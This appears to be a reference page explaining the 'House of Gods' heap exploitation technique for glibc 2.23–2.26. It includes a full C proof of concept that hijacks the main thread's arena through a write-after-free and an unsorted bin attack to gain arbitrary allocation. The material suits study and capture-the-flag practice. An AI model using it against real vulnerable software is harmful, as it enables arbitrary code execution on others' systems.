Skip to main content

Overview

The House of Gods is an arena hijacking technique for glibc < 2.27 that supplies attackers with arbitrary write capability against the thread_arena symbol of the main thread. By hijacking the arena pointer, attackers gain complete control over heap allocation behavior, enabling trivial escalation to arbitrary code execution. The technique demonstrates how to replace main_arena with a carefully crafted fake arena within only 8-11 allocations.

Glibc Version Compatibility

Compatible with: glibc 2.23 - 2.26 onlyPatched in glibc 2.27+The technique relies on specific arena handling that was changed in glibc 2.27. The underlying bug was reported in Bugzilla #29709.

Requirements

  • 8 Allocations: 8 allocations of arbitrary size to hijack arena (+2 for ACE)
  • Chunk Control: Control over first 5 quadwords of chunk userdata
  • Write-After-Free: Single WAF bug on an unsorted chunk
  • Heap Leak: Need heap address leak
  • Libc Leak: Need libc address leak

What It Achieves

The House of Gods enables:
  1. Arena Hijacking: Replace thread_arena with fake arena
  2. Complete Heap Control: Control all malloc operations
  3. Arbitrary Allocation: Return any pointer from malloc
  4. Fast ACE: Trivial escalation to code execution
  5. Efficient: Only 8-11 allocations needed

Technical Details

The Binmap Attack

The core of House of Gods is the “binmap attack” - allocating a fake chunk that overlaps the binmap field within main_arena.
1

Craft Fake Size via Binmap

Allocate and bin a smallchunk (e.g., 0x90) into smallbin. This triggers mark_bin(m, i) which sets the binmap. The value 0x200 at offset 0x855 in main_arena serves as a valid size field for a fake chunk at offset 0x850.
2

Link Binmap Chunk to Unsorted Bin

Use a write-after-free bug to redirect the unsorted bin to the binmap-chunk at main_arena + 0x850. The main_arena.next pointer at offset 0x868 acts as a valid bk pointer, passing the partial unlink check.
3

Allocate Binmap Chunk

Request a chunk of size 0x1f8 (matching the fake size). This allocates the binmap-chunk, giving control over main_arena.next at offset 0x868.
4

Unsorted Bin Attack on narenas

Perform unsorted bin attack targeting the narenas variable, writing a large value to exceed narenas_limit. This forces subsequent allocations to reuse arenas.
5

Inject Fake Arena

Write the address of a fake arena into main_arena.next. This fake arena will be in the arena list traversal.
6

Trigger reused_arena()

Make two allocations for 0xffffffffffffffc0 bytes (invalid size). This triggers reused_arena() twice:
  • First call: returns main_arena
  • Second call: traverses to main_arena.next, returns fake arena
  • Sets thread_arena to fake arena address!

Source Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <inttypes.h>

int main(void) {
    printf("=================\n");
    printf("= House of Gods =\n");
    printf("=================\n\n");

    printf("=== Abstract ===\n\n");
    printf("The core is to allocate a fakechunk overlapping the binmap field\n");
    printf("within main_arena at offset 0x850. The sizefield is crafted by\n");
    printf("binning chunks into smallbins or largebins. The binmap-chunk is\n");
    printf("linked into unsorted bin via WAF, allocated back, giving control\n");
    printf("over main_arena.next at offset 0x868. Unsorted bin attack corrupts\n");
    printf("narenas with a large value. Two allocations for 0xffffffffffffffc0\n");
    printf("bytes trigger reused_arena() twice, traversing the corrupted arena\n");
    printf("list and setting thread_arena to the fake arena.\n\n");

    printf("=== PoC ===\n\n");

    // ========== Allocation 1-3: Setup ==========
    void *SMALLCHUNK = malloc(0x88);
    void *FAST20 = malloc(0x18);
    void *FAST40 = malloc(0x38);

    printf("%p is our 0x90 smallchunk for forging fake size\n", SMALLCHUNK);
    printf("%p is our first fastchunk (0x20)\n", FAST20);
    printf("%p is our second fastchunk (0x40)\n\n", FAST40);

    // ========== Move smallchunk to unsorted bin ==========
    printf("Free smallchunk to move to unsorted bin...\n\n");
    free(SMALLCHUNK);

    // Simulate libc leak
    const uint64_t leak = *((uint64_t*) SMALLCHUNK);

    // ========== Allocation 4: Trigger binmap ==========
    printf("Allocate 0xa0 chunk to bin SMALLCHUNK into 0x90-smallbin\n");
    printf("This sets binmap at offset 0x855 to 0x200 - our fake size!\n\n");
    void *INTM = malloc(0x98);

    // ========== Allocation 5: Setup for binmap attack ==========
    printf("Allocate another smallchunk for binmap attack...\n");
    SMALLCHUNK = malloc(0x88);
    free(SMALLCHUNK);

    printf("Tamper with freed chunk's bk pointer (WAF bug)\n\n");
    
    /* VULNERABILITY #1: Write-after-free */
    *((uint64_t*) (SMALLCHUNK + 0x8)) = leak + 0x7f8; // Point to binmap
    /* VULNERABILITY #1 */

    printf("Redirect unsorted bin to binmap-chunk.\n");
    printf("Fix bin by setting up fastbin chunks...\n\n");

    // Setup bk chain via fastbin
    *((uint64_t*) (FAST40 + 0x8)) = (uint64_t) (INTM - 0x10);
    free(FAST20);
    free(FAST40);

    printf("Unsorted bin chain:\n");
    printf("head -> SMALLCHUNK -> binmap -> main-arena -> FAST40 -> INTM\n\n");

    // ========== Allocation 6: Allocate binmap chunk ==========
    printf("Allocate the binmap-chunk (size 0x1f8)...\n\n");
    void *BINMAP = malloc(0x1f8);

    printf("Success! Now we control main_arena.next and main_arena.system_mem\n\n");

    // ========== Setup unsorted bin attack ==========
    printf("Setup unsorted bin attack on narenas...\n");
    printf("Set INTM's bk to narenas-0x10\n\n");
    
    /* VULNERABILITY #2: Control over allocated chunk */
    *((uint64_t*) (INTM + 0x8)) = leak - 0xa20; // narenas - 0x10
    /* VULNERABILITY #2 */

    printf("Set main_arena.system_mem to pass size checks\n\n");
    *((uint64_t*) (BINMAP + 0x20)) = 0xffffffffffffffff;

    // ========== Allocation 7: Unsorted bin attack ==========
    printf("Trigger unsorted bin attack by allocating INTM...\n\n");
    INTM = malloc(0x98);

    printf("narenas now contains main_arena address (very large value)\n\n");

    // ========== Inject fake arena ==========
    printf("Inject fake arena address into main_arena.next...\n");
    printf("Reusing INTM as fake arena for demo\n\n");
    
    *((uint64_t*) (BINMAP + 0x8)) = (uint64_t) (INTM - 0x10);

    // ========== Trigger reused_arena ==========
    printf("Trigger reused_arena() twice with invalid size requests...\n\n");
    
    malloc(0xffffffffffffffbf + 1); // First call: returns main_arena
    malloc(0xffffffffffffffbf + 1); // Second call: returns fake arena!

    printf("thread_arena now points to our fake arena!\n\n");

    // ========== Demonstrate control ==========
    printf("Demonstrate arbitrary allocation from fake arena...\n\n");

    // Create fake 0x70 chunk on stack
    uint64_t fakechunk[4] = {
        0x0000000000000000, 0x0000000000000073,
        0x4141414141414141, 0x0000000000000000
    };

    // Place in fake arena's 0x70-fastbin
    *((uint64_t*) (INTM + 0x20)) = (uint64_t) (fakechunk);

    printf("Fakechunk at %p\n", fakechunk);
    printf("Target data at %p: %#lx\n\n", &fakechunk[2], fakechunk[2]);

    // ========== Allocation 8: Arbitrary allocation ==========
    printf("Request 0x70 chunk from fake arena...\n");
    void *FAKECHUNK = malloc(0x68);

    printf("Returned: %p\n\n", FAKECHUNK);
    printf("Overwriting allocated chunk changes target data: ");
    
    *((uint64_t*) (FAKECHUNK)) = 0x4242424242424242;
    printf("%#lx\n", fakechunk[2]);

    assert(fakechunk[2] == 0x4242424242424242);

    return EXIT_SUCCESS;
}

Walkthrough

The binmap is a bitmap in main_arena that tracks which bins contain chunks:
struct malloc_state {
  // ... fields ...
  unsigned int binmap[4];  // At offset 0x84c
  // ...
};
When a chunk is binned, mark_bin(m, i) sets a bit:
mark_bin (mstate m, int i) {
  m->binmap[i / 32] |= (1U << (i % 32));
}
For a 0x90 chunk, this sets binmap to 0x200 at offset 0x855.By reading memory at offset 0x850:
+0x850: 0x00
+0x851: 0x00
+0x852: 0x00
+0x853: 0x00
+0x854: 0x00
+0x855: 0x02  ← binmap value
+0x856: 0x00
+0x857: 0x00
This forms size 0x0200, valid for unsorted bin!
When narenas exceeds narenas_limit, malloc calls reused_arena():
static mstate reused_arena(mstate avoid_arena) {
  mstate result = next_to_use;
  // ...
  result = result->next;  // Traverse arena list
  // ...
  return result;
}
The arena list is:
main_arena -> main_arena.next -> ...
By controlling main_arena.next, we control where the second call goes!First call:
  • Starts at next_to_use (= main_arena)
  • Returns main_arena
Second call:
  • Starts at main_arena (from first call)
  • Traverses to main_arena.next (our fake arena!)
  • Returns fake arena
  • Sets thread_arena = fake_arena
When you request 0xffffffffffffffc0 bytes:
  1. Malloc adds header size: 0xffffffffffffffc0 + 0x10 = 0xffffffffffffffd0
  2. Checks if size > PTRDIFF_MAX (maximum valid size)
  3. Fails size check, returns NULL
  4. Before returning, tries to find working arena
  5. Calls reused_arena() to get a different arena
  6. Retries with new arena
This triggers arena traversal without actually allocating anything!
The fake arena only needs minimal setup:
struct malloc_state {
  mutex_t mutex;              // +0x00
  int flags;                  // +0x04  
  mfastbinptr fastbinsY[10];  // +0x08 ← We control this!
  // ... rest doesn't matter for fastbin ...
};
For fastbin-based arbitrary allocation:
  • Set fastbinsY[index] to target address
  • Ensure target has valid size field
  • Call malloc(size) to get target back
For more advanced attacks, populate more fields.

Visual Representation

main_arena Layout:
+0x000: mutex
+0x004: flags
+0x008: fastbinsY[10]
  ...
+0x84c: binmap[0]
+0x850: binmap[1] ← Fake chunk starts here!
+0x854: binmap[2]
+0x855: 0x02      ← Fake size (0x200)
+0x858: binmap[3]
+0x85c: ...
+0x868: next      ← We control this (main_arena.next)

Arena List After Attack:
main_arena ──next──→ fake_arena


                    thread_arena

Allocation Flow:
malloc(0x68) → checks thread_arena
             → thread_arena = fake_arena
             → reads fake_arena->fastbinsY[6]
             → returns stack_chunk

CTF Challenges

No specific challenges listed, but applicable to:
  • CTF challenges on Ubuntu 16.04 (glibc 2.23)
  • Old challenges on glibc 2.24-2.26
  • Historical heap exploitation challenges

References

  • House of Mind - Another arena manipulation technique
  • House of Orange - File stream exploitation with arena
  • [Unsorted Bin Attack/techniques/bins/unsorted-bin-attack) - Used in this technique

Author

David Milosevic (milo)

Build docs developers (and LLMs) love